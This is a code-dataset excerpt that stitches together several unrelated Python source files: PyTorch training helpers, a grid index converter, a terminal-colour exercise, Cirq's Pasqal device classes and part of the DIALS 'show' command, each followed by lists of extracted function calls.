'()', False, 'from antpat.reps.sphgridfun.tvecfun import TVecFields\n'), ((33, 22, 33, 40), 'antpat.radfarfield.RadFarField', 'RadFarField', ({(33, 34, 33, 39): 'tvf_p'}, {}), '(tvf_p)', False, 'from antpat.radfarfield import RadFarField\n'), ((33, 42, 33, 60), 'antpat.radfarfield.RadFarField', 'RadFarField', ({(33, 54, 33, 59): 'tvf_q'}, {}), '(tvf_q)', False, 'from antpat.radfarfield import RadFarField\n'), ((34, 34, 34, 63), 'os.path.basename', 'os.path.basename', ({(34, 51, 34, 62): 'p_chan_file'}, {}), '(p_chan_file)', False, 'import os\n'), ((34, 65, 34, 94), 'os.path.basename', 'os.path.basename', ({(34, 82, 34, 93): 'q_chan_file'}, {}), '(q_chan_file)', False, 'import os\n'), ((40, 14, 40, 28), 'numpy.cos', 'numpy.cos', ({(40, 24, 40, 27): 'PHI'}, {}), '(PHI)', False, 'import numpy\n'), ((41, 14, 41, 28), 'numpy.sin', 'numpy.sin', ({(41, 24, 41, 27): 'PHI'}, {}), '(PHI)', False, 'import numpy\n'), ((21, 51, 21, 73), 'numpy.conjugate', 'numpy.conjugate', ({(21, 67, 21, 72): 'Jones'}, {}), '(Jones)', False, 'import numpy\n'), ((47, 28, 47, 48), 'numpy.log10', 'numpy.log10', ({(47, 40, 47, 47): 'StokesI'}, {}), '(StokesI)', False, 'import numpy\n')]
lingjiao10/Facial-Expression-Recognition.Pytorch
utils.py
f5ba0e527347af3778d44eb7045e4970d01641a6
'''Some helper functions for PyTorch, including: - progress_bar: progress bar mimic xlua.progress. - set_lr : set the learning rate - clip_gradient : clip gradient ''' import os import sys import time import math import torch import torch.nn as nn import torch.nn.init as init from torch.autograd import Function #获取控制台行、列数 if sys.platform == 'win32': term_width = 80 else: print('###', os.popen('stty size', 'r').read()) _, term_width = os.popen('stty size', 'r').read().split() term_width = int(term_width) TOTAL_BAR_LENGTH = 30. last_time = time.time() begin_time = last_time #[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432) def progress_bar(current, total, msg=None): global last_time, begin_time if current == 0: begin_time = time.time() # Reset for new bar. cur_len = int(TOTAL_BAR_LENGTH*current/total) rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1 sys.stdout.write(' [') for i in range(cur_len): sys.stdout.write('=') sys.stdout.write('>') for i in range(rest_len): sys.stdout.write('.') sys.stdout.write(']') cur_time = time.time() step_time = cur_time - last_time last_time = cur_time tot_time = cur_time - begin_time L = [] if msg: L.append(' | ' + msg) msg = ''.join(L) sys.stdout.write(msg) for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3): sys.stdout.write(' ') # Go back to the center of the bar. for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2): sys.stdout.write('\b') sys.stdout.write(' %d/%d ' % (current+1, total)) if current < total-1: sys.stdout.write('\r') else: sys.stdout.write('\n') sys.stdout.flush() def set_lr(optimizer, lr): for group in optimizer.param_groups: group['lr'] = lr def clip_gradient(optimizer, grad_clip): for group in optimizer.param_groups: #print(group['params']) for param in group['params']: param.grad.data.clamp_(-grad_clip, grad_clip)
[((25, 12, 25, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((37, 4, 37, 26), 'sys.stdout.write', 'sys.stdout.write', ({(37, 21, 37, 25): '""" ["""'}, {}), "(' [')", False, 'import sys\n'), ((40, 4, 40, 25), 'sys.stdout.write', 'sys.stdout.write', ({(40, 21, 40, 24): '""">"""'}, {}), "('>')", False, 'import sys\n'), ((43, 4, 43, 25), 'sys.stdout.write', 'sys.stdout.write', ({(43, 21, 43, 24): '"""]"""'}, {}), "(']')", False, 'import sys\n'), ((45, 15, 45, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((55, 4, 55, 25), 'sys.stdout.write', 'sys.stdout.write', ({(55, 21, 55, 24): 'msg'}, {}), '(msg)', False, 'import sys\n'), ((62, 4, 62, 52), 'sys.stdout.write', 'sys.stdout.write', ({(62, 21, 62, 51): "(' %d/%d ' % (current + 1, total))"}, {}), "(' %d/%d ' % (current + 1, total))", False, 'import sys\n'), ((68, 4, 68, 22), 'sys.stdout.flush', 'sys.stdout.flush', ({}, {}), '()', False, 'import sys\n'), ((32, 21, 32, 32), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((39, 8, 39, 29), 'sys.stdout.write', 'sys.stdout.write', ({(39, 25, 39, 28): '"""="""'}, {}), "('=')", False, 'import sys\n'), ((42, 8, 42, 29), 'sys.stdout.write', 'sys.stdout.write', ({(42, 25, 42, 28): '"""."""'}, {}), "('.')", False, 'import sys\n'), ((57, 8, 57, 29), 'sys.stdout.write', 'sys.stdout.write', ({(57, 25, 57, 28): '""" """'}, {}), "(' ')", False, 'import sys\n'), ((61, 8, 61, 30), 'sys.stdout.write', 'sys.stdout.write', ({(61, 25, 61, 29): '"""\x08"""'}, {}), "('\\x08')", False, 'import sys\n'), ((65, 8, 65, 30), 'sys.stdout.write', 'sys.stdout.write', ({(65, 25, 65, 29): "'\\r'"}, {}), "('\\r')", False, 'import sys\n'), ((67, 8, 67, 30), 'sys.stdout.write', 'sys.stdout.write', ({(67, 25, 67, 29): '"""\n"""'}, {}), "('\\n')", False, 'import sys\n'), ((20, 14, 20, 40), 'os.popen', 'os.popen', ({(20, 23, 20, 34): '"""stty size"""', (20, 36, 20, 39): '"""r"""'}, {}), "('stty size', 'r')", False, 'import os\n'), ((21, 17, 21, 43), 'os.popen', 'os.popen', ({(21, 26, 21, 37): '"""stty size"""', (21, 39, 21, 42): '"""r"""'}, {}), "('stty size', 'r')", False, 'import os\n')]
delemottelab/gpcr-string-method-2019
string-method/src/analysis/FE_analysis/index_converter.py
b50786a4a8747d56ad04ede525592eb31f1890fd
from __future__ import absolute_import, division, print_function import logging import sys logging.basicConfig( stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S') import numpy as np import utils logger = logging.getLogger("indexconverter") class IndexConverter(object): def __init__(self, ndim, ngrid): self.ndim = ndim self.ngrid = ngrid self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)] self._zerodim = np.zeros((self.ndim,)) self.nbins = int(np.rint((ngrid - 1) ** ndim)) def convert_to_vector(self, grid): if grid.shape[0] != self.ngrid - 1: raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0])) vector = np.empty((self.nbins,)) for bin_idx in range(self.nbins): vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))] return vector def convert_to_grid(self, vector): grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1)) if len(vector.shape) > 1: grids = np.empty((len(vector),) + grid_shape) for idx, v in enumerate(vector): grids[idx] = self.convert_to_grid(v) return grids else: grid = np.zeros(grid_shape) for idx in range(len(vector)): grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx] return grid def convert_to_grid_idx(self, bin_idx): if bin_idx >= self.nbins or bin_idx < 0: print(self.nbins, self.ndim, self.nbins ** self.ndim) raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx) grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1) return grid_idx.astype(int) def convert_to_bin_idx(self, grid_idx): bin_idx = utils.rint(np.sum(grid_idx * self._modulus)) if bin_idx >= self.nbins or bin_idx < 0: raise Exception( "Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins)) return bin_idx
[((6, 0, 10, 32), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((13, 9, 13, 44), 'logging.getLogger', 'logging.getLogger', ({(13, 27, 13, 43): '"""indexconverter"""'}, {}), "('indexconverter')", False, 'import logging\n'), ((21, 24, 21, 46), 'numpy.zeros', 'np.zeros', ({(21, 33, 21, 45): '(self.ndim,)'}, {}), '((self.ndim,))', True, 'import numpy as np\n'), ((27, 17, 27, 40), 'numpy.empty', 'np.empty', ({(27, 26, 27, 39): '(self.nbins,)'}, {}), '((self.nbins,))', True, 'import numpy as np\n'), ((22, 25, 22, 53), 'numpy.rint', 'np.rint', ({(22, 33, 22, 52): '(ngrid - 1) ** ndim'}, {}), '((ngrid - 1) ** ndim)', True, 'import numpy as np\n'), ((40, 19, 40, 39), 'numpy.zeros', 'np.zeros', ({(40, 28, 40, 38): 'grid_shape'}, {}), '(grid_shape)', True, 'import numpy as np\n'), ((53, 29, 53, 61), 'numpy.sum', 'np.sum', ({(53, 36, 53, 60): 'grid_idx * self._modulus'}, {}), '(grid_idx * self._modulus)', True, 'import numpy as np\n'), ((33, 27, 33, 46), 'numpy.zeros', 'np.zeros', ({(33, 36, 33, 45): 'self.ndim'}, {}), '(self.ndim)', True, 'import numpy as np\n')]
andersontmachado/ExerciciosPython
Ex029 Aula 11-Cores no Terminal.py
ebd93eb4127dadedee8b719ccc4bc20fc151d0ad
print('\033[7;30mOla mundo\033[m!!!')
[]
pavoljuhas/Cirq
cirq-pasqal/cirq_pasqal/pasqal_device.py
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
# Copyright 2020 The Cirq Developers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict import numpy as np import networkx as nx import cirq from cirq import _compat, GridQubit, LineQubit from cirq.ops import NamedQubit from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset @cirq.value.value_equality class PasqalDevice(cirq.devices.Device): """A generic Pasqal device. The most general of Pasqal devices, enforcing only restrictions expected to be shared by all future devices. Serves as the parent class of all Pasqal devices, but can also be used on its own for hosting a nearly unconstrained device. When used as a circuit's device, the qubits have to be of the type cirq.NamedQubit and assumed to be all connected, the idea behind it being that after submission, all optimization and transpilation necessary for its execution on the specified device are handled internally by Pasqal. """ def __init__(self, qubits: Sequence[cirq.Qid]) -> None: """Initializes a device with some qubits. Args: qubits (NamedQubit): Qubits on the device, exclusively unrelated to a physical position. Raises: TypeError: If the wrong qubit type is provided. ValueError: If the number of qubits is greater than the devices maximum. """ if len(qubits) > 0: q_type = type(qubits[0]) for q in qubits: if not isinstance(q, self.supported_qubit_type): raise TypeError( 'Unsupported qubit type: {!r}. This device ' 'supports qubit types: {}'.format(q, self.supported_qubit_type) ) if not type(q) is q_type: raise TypeError("All qubits must be of same type.") if len(qubits) > self.maximum_qubit_number: raise ValueError( 'Too many qubits. {} accepts at most {} ' 'qubits.'.format(type(self), self.maximum_qubit_number) ) self.gateset = PasqalGateset() self.qubits = qubits self._metadata = cirq.DeviceMetadata( qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b]) ) # pylint: enable=missing-raises-doc @property def supported_qubit_type(self): return (NamedQubit,) @property def maximum_qubit_number(self): return 100 @property def metadata(self): return self._metadata @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15') def qubit_set(self) -> FrozenSet[cirq.Qid]: return frozenset(self.qubits) def qubit_list(self): return [qubit for qubit in self.qubits] def is_pasqal_device_op(self, op: cirq.Operation) -> bool: if not isinstance(op, cirq.Operation): raise ValueError('Got unknown operation:', op) return op in self.gateset def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: The operation to validate. Raises: ValueError: If the operation is not valid. NotImplementedError: If the operation is a measurement with an invert mask. """ if not isinstance(operation, cirq.GateOperation): raise ValueError("Unsupported operation") if not self.is_pasqal_device_op(operation): raise ValueError(f'{operation.gate!r} is not a supported gate') for qub in operation.qubits: if not isinstance(qub, self.supported_qubit_type): raise ValueError( '{} is not a valid qubit for gate {!r}. This ' 'device accepts gates on qubits of type: ' '{}'.format(qub, operation.gate, self.supported_qubit_type) ) if qub not in self.metadata.qubit_set: raise ValueError(f'{qub} is not part of the device.') if isinstance(operation.gate, cirq.MeasurementGate): if operation.gate.invert_mask != (): raise NotImplementedError( "Measurements on Pasqal devices don't support invert_mask." ) def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None: """Raises an error if the given circuit is invalid on this device. A circuit is invalid if any of its moments are invalid or if there is a non-empty moment after a moment with a measurement. Args: circuit: The circuit to validate Raises: ValueError: If the given circuit can't be run on this device """ super().validate_circuit(circuit) # Measurements must be in the last non-empty moment has_measurement_occurred = False for moment in circuit: if has_measurement_occurred: if len(moment.operations) > 0: raise ValueError("Non-empty moment after measurement") for operation in moment.operations: if isinstance(operation.gate, cirq.MeasurementGate): has_measurement_occurred = True def __repr__(self): return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})' def _value_equality_values_(self): return self.qubits def _json_dict_(self): return cirq.protocols.obj_to_dict_helper(self, ['qubits']) class PasqalVirtualDevice(PasqalDevice): """A Pasqal virtual device with qubits in 3d. A virtual representation of a Pasqal device, enforcing the constraints typically found in a physical device. The qubits can be positioned in 3d space, although 2d layouts will be supported sooner and are thus recommended. Only accepts qubits with physical placement. """ def __init__( self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]] ) -> None: """Initializes a device with some qubits. Args: control_radius: the maximum distance between qubits for a controlled gate. Distance is measured in units of the coordinates passed into the qubit constructor. qubits: Qubits on the device, identified by their x, y, z position. Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit. Raises: ValueError: if the wrong qubit type is provided or if invalid parameter is provided for control_radius.""" super().__init__(qubits) if not control_radius >= 0: raise ValueError('Control_radius needs to be a non-negative float.') if len(self.qubits) > 1: if control_radius > 3.0 * self.minimal_distance(): raise ValueError( 'Control_radius cannot be larger than 3 times' ' the minimal distance between qubits.' ) self.control_radius = control_radius self.gateset = PasqalGateset(include_additional_controlled_ops=False) self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate)) @property def supported_qubit_type(self): return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit) def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: the operation to validate Raises: ValueError: If the operation is not valid """ super().validate_operation(operation) # Verify that a controlled gate operation is valid if operation in self.controlled_gateset: for p in operation.qubits: for q in operation.qubits: if self.distance(p, q) > self.control_radius: raise ValueError(f"Qubits {p!r}, {q!r} are too far away") def validate_moment(self, moment: cirq.Moment): """Raises an error if the given moment is invalid on this device. Args: moment: The moment to validate. Raises: ValueError: If the given moment is invalid. """ super().validate_moment(moment) if len(moment) > 1: for operation in moment: if not isinstance(operation.gate, cirq.MeasurementGate): raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.") def minimal_distance(self) -> float: """Returns the minimal distance between two qubits in qubits. Args: qubits: qubit involved in the distance computation Raises: ValueError: If the device has only one qubit Returns: The minimal distance between qubits, in spacial coordinate units. """ if len(self.qubits) <= 1: raise ValueError("Two qubits to compute a minimal distance.") return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2]) def distance(self, p: Any, q: Any) -> float: """Returns the distance between two qubits. Args: p: qubit involved in the distance computation q: qubit involved in the distance computation Raises: ValueError: If p or q not part of the device Returns: The distance between qubits p and q. """ all_qubits = self.qubit_list() if p not in all_qubits or q not in all_qubits: raise ValueError("Qubit not part of the device.") if isinstance(p, GridQubit): return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2) if isinstance(p, LineQubit): return abs(p.x - q.x) return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2) def __repr__(self): return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format( self.control_radius, sorted(self.qubits) ) def _value_equality_values_(self) -> Any: return (self.control_radius, self.qubits) def _json_dict_(self) -> Dict[str, Any]: return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits']) @_compat.deprecated_class( deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).' ) class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates): """A gate converter for compatibility with Pasqal processors. Modified version of ConvertToNeutralAtomGates, where a new 'convert' method 'pasqal_convert' takes the 'keep' function as an input. """ def pasqal_convert( self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool] ) -> List[cirq.Operation]: def on_stuck_raise(bad): return TypeError( "Don't know how to work with {!r}. " "It isn't a native PasqalDevice operation, " "a 1 or 2 qubit gate with a known unitary, " "or composite.".format(bad) ) return cirq.protocols.decompose( op, keep=keep, intercepting_decomposer=self._convert_one, on_stuck_raise=None if self.ignore_failures else on_stuck_raise, )
[((295, 1, 297, 1), 'cirq._compat.deprecated_class', '_compat.deprecated_class', (), '', False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((85, 5, 85, 88), 'cirq._compat.deprecated', '_compat.deprecated', (), '', False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((66, 23, 66, 38), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ({}, {}), '()', False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((162, 15, 162, 66), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', ({(162, 49, 162, 53): 'self', (162, 55, 162, 65): "['qubits']"}, {}), "(self, ['qubits'])", False, 'import cirq\n'), ((202, 23, 202, 77), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', (), '', False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((281, 15, 281, 78), 'numpy.sqrt', 'np.sqrt', ({(281, 23, 281, 77): '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'}, {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)', True, 'import numpy as np\n'), ((292, 15, 292, 84), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', ({(292, 49, 292, 53): 'self', (292, 55, 292, 83): "['control_radius', 'qubits']"}, {}), "(self, ['control_radius', 'qubits'])", False, 'import cirq\n'), ((316, 15, 321, 9), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (), '', False, 'import cirq\n'), ((69, 20, 69, 88), 'networkx.from_edgelist', 'nx.from_edgelist', ({(69, 37, 69, 87): '[(a, b) for a in qubits for b in qubits if a != b]'}, {}), '([(a, b) for a in qubits for b in qubits if a != b])', True, 'import networkx as nx\n'), ((203, 47, 203, 93), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', ({(203, 78, 203, 92): 'cirq.CZPowGate'}, {}), '(cirq.CZPowGate)', False, 'import cirq\n'), ((276, 19, 276, 71), 'numpy.sqrt', 'np.sqrt', ({(276, 27, 276, 70): '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'}, {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)', True, 'import numpy as np\n')]
huwjenkins/dials
command_line/show.py
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
import os import sys import numpy as np import iotbx.phil from cctbx import uctbx from dxtbx.model.experiment_list import ExperimentListFactory from scitbx.math import five_number_summary import dials.util from dials.array_family import flex from dials.util import Sorry, tabulate help_message = """ Examples:: dials.show models.expt dials.show image_*.cbf dials.show observations.refl """ phil_scope = iotbx.phil.parse( """\ show_scan_varying = False .type = bool .help = "Whether or not to show the crystal at each scan point." show_shared_models = False .type = bool .help = "Show which models are linked to which experiments" show_all_reflection_data = False .type = bool .help = "Whether or not to print individual reflections" show_intensities = False .type = bool show_centroids = False .type = bool show_profile_fit = False .type = bool show_flags = False .type = bool .help = "Show a summary table of reflection flags" show_identifiers = False .type = bool .help = "Show experiment identifiers map if set" image_statistics{ show_corrected = False .type = bool .help = "Show statistics on the distribution of values in each corrected image" show_raw = False .type = bool .help = "Show statistics on the distribution of values in each raw image" } max_reflections = None .type = int .help = "Limit the number of reflections in the output." """, process_includes=True, ) def beam_centre_mm(detector, s0): x, y = (None, None) for panel_id, panel in enumerate(detector): try: x, y = panel.get_ray_intersection(s0) except RuntimeError: continue else: if panel.is_coord_valid_mm((x, y)): break else: x, y = (None, None) return panel_id, (x, y) def beam_centre_raw_image_px(detector, s0): panel_id, (x, y) = beam_centre_mm(detector, s0) panel = detector[panel_id] x_px, y_px = panel.millimeter_to_pixel((x, y)) offset = panel.get_raw_image_offset() return x_px + offset[0], y_px + offset[1] def show_beam(detector, beam): # standard static beam model string s = str(beam) # report whether the beam is scan-varying if beam.num_scan_points > 0: s += " s0 sampled at " + str(beam.num_scan_points) + " scan points\n" # add static model beam centres panel_id, (x, y) = beam_centre_mm(detector, beam.get_s0()) if panel_id >= 0 and x is not None and y is not None: x_px, y_px = detector[panel_id].millimeter_to_pixel((x, y)) if len(detector) > 1: beam_centre_mm_str = " mm: panel %i, (%.2f,%.2f)" % (panel_id, x, y) beam_centre_px_str = " px: panel %i, (%.2f,%.2f)" % ( panel_id, x_px, y_px, ) x_raw_px, y_raw_px = beam_centre_raw_image_px(detector, beam.get_s0()) beam_centre_raw_px_str = " px, raw image: ({:.2f},{:.2f})".format( x_raw_px, y_raw_px, ) x_raw_mm, y_raw_mm = detector[panel_id].pixel_to_millimeter( (x_raw_px, y_raw_px) ) beam_centre_raw_mm_str = " mm, raw image: ({:.2f},{:.2f})".format( x_raw_mm, y_raw_mm, ) else: beam_centre_mm_str = f" mm: ({x:.2f},{y:.2f})" beam_centre_px_str = f" px: ({x_px:.2f},{y_px:.2f})" beam_centre_raw_px_str = "" beam_centre_raw_mm_str = "" s += "\nBeam centre: \n" s += beam_centre_mm_str + "\n" + beam_centre_px_str + "\n" if beam_centre_raw_mm_str: s += beam_centre_raw_mm_str + "\n" if beam_centre_raw_px_str: s += beam_centre_raw_px_str + "\n" # report range of scan-varying model beam centres if beam.num_scan_points > 0: # get scan-varying beam centres, ensuring all on same panel sv_s0 = beam.get_s0_at_scan_points() impacts = [beam_centre_mm(detector, s0) for s0 in sv_s0] pnl, xy = zip(*impacts) uniq_pnls = set(pnl) if len(uniq_pnls) > 1 or min(uniq_pnls) < 0: return s if any(e == (None, None) for e in xy): return s pnl = list(uniq_pnls)[0] x_mm, y_mm = zip(*xy) # convert to pixels xy = [detector[pnl].millimeter_to_pixel(e) for e in xy] x_px, y_px = zip(*xy) s += "Beam centre range (mm): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format( min(x_mm), max(x_mm), min(y_mm), max(y_mm), ) s += "Beam centre range (px): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format( min(x_px), max(x_px), min(y_px), max(y_px), ) return s def show_goniometer(goniometer): # standard static goniometer model string s = str(goniometer) # report whether the goniometer is scan-varying if goniometer.num_scan_points > 0: s += ( " Setting rotation sampled at " + str(goniometer.num_scan_points) + " scan points\n" ) return s @dials.util.show_mail_handle_errors() def run(args=None): import dials.util.log dials.util.log.print_banner() from dials.util.options import OptionParser, reflections_and_experiments_from_files usage = "dials.show [options] models.expt | image_*.cbf" parser = OptionParser( usage=usage, phil=phil_scope, read_experiments=True, read_experiments_from_images=True, read_reflections=True, check_format=False, epilog=help_message, ) params, options = parser.parse_args(args=args, show_diff_phil=True) reflections, experiments = reflections_and_experiments_from_files( params.input.reflections, params.input.experiments ) if len(experiments) == 0 and len(reflections) == 0: parser.print_help() exit() if len(experiments): if not all(e.detector for e in experiments): sys.exit("Error: experiment has no detector") if not all(e.beam for e in experiments): sys.exit("Error: experiment has no beam") print(show_experiments(experiments, show_scan_varying=params.show_scan_varying)) if params.image_statistics.show_raw: show_image_statistics(experiments, "raw") if params.image_statistics.show_corrected: show_image_statistics(experiments, "corrected") if params.show_shared_models: print() print(model_connectivity(experiments)) if len(reflections): print( show_reflections( reflections, show_intensities=params.show_intensities, show_profile_fit=params.show_profile_fit, show_centroids=params.show_centroids, show_all_reflection_data=params.show_all_reflection_data, show_flags=params.show_flags, max_reflections=params.max_reflections, show_identifiers=params.show_identifiers, ) ) def show_experiments(experiments, show_scan_varying=False): text = [] for i_expt, expt in enumerate(experiments): text.append("Experiment %i:" % i_expt) format_class = expt.imageset.get_format_class() if format_class.__name__ != "Format": text.append(f"Format class: {format_class.__name__}") if expt.identifier != "": text.append(f"Experiment identifier: {expt.identifier}") try: template = expt.imageset.get_template() except AttributeError: template = None if template: text.append(f"Image template: {template}") text.append(str(expt.detector)) text.append( "Max resolution (at corners): %f" % (expt.detector.get_max_resolution(expt.beam.get_s0())) ) text.append( "Max resolution (inscribed): %f" % (expt.detector.get_max_inscribed_resolution(expt.beam.get_s0())) ) text.append("") text.append(show_beam(expt.detector, expt.beam)) if expt.scan is not None: text.append(str(expt.scan)) if expt.goniometer is not None: text.append(show_goniometer(expt.goniometer)) if expt.crystal is not None: text.append(expt.crystal.as_str(show_scan_varying=show_scan_varying)) if expt.crystal.num_scan_points: abc = flex.vec3_double() angles = flex.vec3_double() for n in range(expt.crystal.num_scan_points): ( a, b, c, alpha, beta, gamma, ) = expt.crystal.get_unit_cell_at_scan_point(n).parameters() abc.append((a, b, c)) angles.append((alpha, beta, gamma)) a, b, c = abc.mean() alpha, beta, gamma = angles.mean() mean_unit_cell = uctbx.unit_cell((a, b, c, alpha, beta, gamma)) text.append(f" Average unit cell: {mean_unit_cell}") if expt.profile is not None: text.append(str(expt.profile)) if expt.scaling_model is not None: text.append(str(expt.scaling_model)) return "\n".join(text) def show_image_statistics(experiments, im_type): if im_type == "raw": raw = True elif im_type == "corrected": raw = False else: raise ValueError(f"Unknown im_type: {im_type}") # To show image statistics, check_format has to be true. So we have to reinstatiate # the experiment list here try: experiments = ExperimentListFactory.from_json( experiments.as_json(), check_format=True ) except OSError as e: raise Sorry( f"Unable to read image data. Please check {e.filename} is accessible" ) print(f"Five number summary of the {im_type} images") for i_expt, expt in enumerate(experiments): for i in range(len(expt.imageset)): identifier = os.path.basename(expt.imageset.get_image_identifier(i)) if raw: pnl_data = expt.imageset.get_raw_data(i) else: pnl_data = expt.imageset.get_corrected_data(i) if not isinstance(pnl_data, tuple): pnl_data = (pnl_data,) flat_data = pnl_data[0].as_1d() for p in pnl_data[1:]: flat_data.extend(p.as_1d()) fns = five_number_summary(flat_data) print( "{}: Min: {:.1f} Q1: {:.1f} Med: {:.1f} Q3: {:.1f} Max: {:.1f}".format( identifier, *fns ) ) def model_connectivity(experiments): def model_connectivity_impl(experiments, model): text = [""] text.append(f"{model.capitalize()}:") models = getattr(experiments, f"{model}s")() rows = [[""] + [str(j) for j in range(len(models))]] for j, e in enumerate(experiments): row = ["Experiment %d" % j] for m in models: if getattr(e, model) is m: row.append("x") else: row.append(".") rows.append(row) text.append(tabulate(rows, tablefmt="plain")) return text if len(experiments) == 1: return "" text = [] text.append("Experiment / Models") text.extend(model_connectivity_impl(experiments, "detector")) text.extend(model_connectivity_impl(experiments, "crystal")) text.extend(model_connectivity_impl(experiments, "beam")) return "\n".join(text) def _create_flag_count_table(table): """Generate a summary table of flag values in a reflection table. :param table: A reflection table :returns: A string of the formatted flags table """ # Calculate the counts of entries that match each flag numpy_flags = table["flags"].as_numpy_array() flag_count = { flag: np.sum(numpy_flags & value != 0) for value, flag in table.flags.values.items() } # Work out the numeric-value order of the flags flag_order = sorted(table.flags.values.values(), key=lambda x: x.real) # Build the actual table flag_rows = [["Flag", "Count", "%"]] max_count_len = max(5, len(str(max(flag_count.values())))) last_flag = None for flag in flag_order: indent = "" # As a hint for reading, indent any 'summary' flags. # A summary flag is any flag which overlaps with the previous one. if last_flag and (last_flag.real & flag.real): indent = " " last_flag = flag # Add the row to the table we're building flag_rows.append( [ indent + flag.name, "{:{:d}d}".format(flag_count[flag], max_count_len), f"{100 * flag_count[flag] / len(table):5.01f}", ] ) # Build the array of output strings text = [] text.append("Reflection flags:") text.append(tabulate(flag_rows, headers="firstrow")) return "\n".join(text) def show_reflections( reflections, show_intensities=False, show_profile_fit=False, show_centroids=False, show_all_reflection_data=False, show_flags=False, max_reflections=None, show_identifiers=False, ): text = [] from orderedset import OrderedSet formats = { "miller_index": "%i, %i, %i", "d": "%.2f", "qe": "%.3f", "dqe": "%.3f", "id": "%i", "imageset_id": "%i", "panel": "%i", "flags": "%i", "background.mean": "%.1f", "background.dispersion": "%.1f", "background.mse": "%.1f", "background.sum.value": "%.1f", "background.sum.variance": "%.1f", "intensity.prf.value": "%.1f", "intensity.prf.variance": "%.1f", "intensity.sum.value": "%.1f", "intensity.sum.variance": "%.1f", "intensity.cor.value": "%.1f", "intensity.cor.variance": "%.1f", "intensity.scale.value": "%.1f", "intensity.scale.variance": "%.1f", "Ih_values": "%.1f", "lp": "%.3f", "num_pixels.background": "%i", "num_pixels.background_used": "%i", "num_pixels.foreground": "%i", "num_pixels.valid": "%i", "partial_id": "%i", "partiality": "%.4f", "profile.correlation": "%.3f", "profile.rmsd": "%.3f", "xyzcal.mm": "%.2f, %.2f, %.2f", "xyzcal.px": "%.2f, %.2f, %.2f", "delpsical.rad": "%.3f", "delpsical2": "%.3f", "delpsical.weights": "%.3f", "xyzobs.mm.value": "%.2f, %.2f, %.2f", "xyzobs.mm.variance": "%.4e, %.4e, %.4e", "xyzobs.px.value": "%.2f, %.2f, %.2f", "xyzobs.px.variance": "%.4f, %.4f, %.4f", "s1": "%.4f, %.4f, %.4f", "s2": "%.4f, %.4f, %.4f", "shoebox": "%.1f", "rlp": "%.4f, %.4f, %.4f", "zeta": "%.3f", "x_resid": "%.3f", "x_resid2": "%.3f", "y_resid": "%.3f", "y_resid2": "%.3f", 